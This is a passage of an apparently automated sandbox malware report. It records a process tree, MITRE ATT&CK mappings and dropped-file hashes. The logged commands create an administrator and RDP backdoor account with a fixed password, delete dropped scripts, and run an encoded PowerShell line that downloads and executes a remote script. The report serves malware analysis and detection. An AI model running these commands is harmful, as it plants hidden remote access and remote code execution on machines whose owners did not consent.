    - Suspicious use of WriteProcessMemory
    PID:932
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2916
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4640
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:4636
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3416
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2288
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2284
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:912
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3952

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Indicator Removal: Network Share Connection Removal
- Suspicious use of WriteProcessMemory
PID:1256
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - Suspicious use of WriteProcessMemory
  PID:4404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:384

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc hlfoxRBK /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3168
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc hlfoxRBK /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc hlfoxRBK /add
    3⤵
    PID:4544

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:4152
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:756

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" OFGADUSE$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:5048
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" OFGADUSE$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" OFGADUSE$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:408

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2180
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:668

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc hlfoxRBK
1⤵
PID:3444
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc hlfoxRBK
  2⤵
  PID:428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc hlfoxRBK
    3⤵
    PID:3348

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4968
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3544

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3804
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2652

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4936
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:4808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBAE4.tmp

Filesize
1KB

MD5
206ea5264bb4333de0732c38a1984316

SHA1
83aad6f5a11a3f8eecbe7ef5607d786082085cb4

SHA256
4793be37ca9b4ed34b81d560f703df60c88828f5d732b7e4d7ded3cc53cc8dc0

SHA512
a6e456fc3ecb680f2d83047e6cc69c07669ffeb33e7977b647d8ee8b171ae4853086890d44888605491183b0d481fb11d1b3fc65078c60f654bc1215e5d7b064

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnhhoiiy.qvn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\braotvl2\braotvl2.dll

Filesize
3KB

MD5
f797ba1dbcb4495309b24f2fca1f6672

SHA1
8262d2389598907350b11d1bedb315661075da80

SHA256
cb18cab795bbb77f4579b6627e3bc4fed96670b57e81b843c9530d2586bcbe76

SHA512
c85f3f709017b2d7c4dac3602b85d9b38238c04627919f0194539ea8e7f48520351b14cbdf8af445b2c864d46c10d5ca9f35c4137cafed9dc66307d386f75c8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
00fb904b2dd958760943b89400e9b7f9

SHA1
8c825862b6f70cbaef991525f31100f713e61e7d

SHA256
392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a

SHA512
ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
b110f38845e18a04ab59a7d8a134ef40

SHA1
8119030034e6fbe62d875e824b5233c1f29d61a0

SHA256
1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea

SHA512
80eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
5768a809b9fcbff117dffa8cbf2e8852

SHA1
a056e76d15bc7509d0361175b2ae4ba348460cd6

SHA256
8ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094

SHA512
99d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIE30D.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\braotvl2\CSCD04D98576D43466283717542B6EBDD10.TMP

Filesize
652B

MD5
100d63d25b3d8e19cbf081d39b4041f6

SHA1
1be214ebccba0533de1de8554b77d46fb1a3eae3

SHA256
73b5a67d2fef58e50be12b7549df25ba9623a23fc1881682d2795753b8aa592d

SHA512
5611b4c218981ee7fdf6ee31d53d55681cad0f3b438a7a3729a04fff7522fa8fe6d793e07be363ca504f46f8911630dd27e1d59583f2b33c23f979af65350a11

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\braotvl2\braotvl2.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\braotvl2\braotvl2.cmdline

Filesize
369B

MD5
2aeba5111f604f6ca6ff700c17b0dbea

SHA1
4e677aac1babdac11a5fbe2730bf6790f58f5e64

SHA256
ddf25d699cfa78fbe273629933e9fb73d82682eeb16f1ad45abf4f9bb0df3a6e

SHA512
2c130c3e2893a3554a5c66755df828e9095557409b8c0a6f3ab2ba9132196f9abce80c5037477e13f92311a9f0d89ced3189fed74f7888a3d5165721e07e39d3

Download Submit
memory/4744-34-0x000001D44C5C0000-0x000001D44C5C8000-memory.dmp

Filesize
32KB

Download
memory/4744-83-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/4744-19-0x000001D44C550000-0x000001D44C572000-memory.dmp

Filesize
136KB

Download
memory/4744-133-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/4744-18-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/4744-8-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/4744-37-0x000001D44D3F0000-0x000001D44D566000-memory.dmp

Filesize
1.5MB

Download
memory/4744-38-0x000001D44D780000-0x000001D44D98A000-memory.dmp

Filesize
2.0MB

Download
memory/4744-97-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/4744-25-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/5000-49-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/5000-5-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/5000-4-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/5000-3-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/5000-2-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download
memory/5000-48-0x00007FFFC1E73000-0x00007FFFC1E75000-memory.dmp

Filesize
8KB

Download
memory/5000-1-0x000002216AA70000-0x000002216AE96000-memory.dmp

Filesize
4.1MB

Download
memory/5000-0-0x00007FFFC1E73000-0x00007FFFC1E75000-memory.dmp

Filesize
8KB

Download
memory/5000-135-0x00007FFFC1E70000-0x00007FFFC2931000-memory.dmp

Filesize
10.8MB

Download